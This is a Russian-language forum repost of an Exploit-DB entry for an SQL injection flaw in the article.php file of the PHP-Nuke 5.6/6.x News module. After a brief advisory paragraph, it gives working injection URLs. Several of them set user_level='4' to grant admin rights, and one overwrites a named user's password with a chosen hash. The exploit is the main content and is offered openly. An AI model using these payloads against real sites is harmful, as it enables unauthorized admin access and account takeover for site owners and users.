Exploit PHP-Nuke 5.6/6.x News Module - 'article.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22413
Проверка EDB
  1. Пройдено
Автор
FROG
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2003-03-22
Код:
source: https://www.securityfocus.com/bid/7172/info

It has been reported that an input validation error exists in the article.php file included with PHPNuke as part of the News module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to manipulate the database, and gain unauthorized access to user accounts.

if magic_quotes_gpc=OFF :

Change our level (into admin) :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4


Change the user Bob's password :
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*
 
Источник
www.exploit-db.com

Похожие темы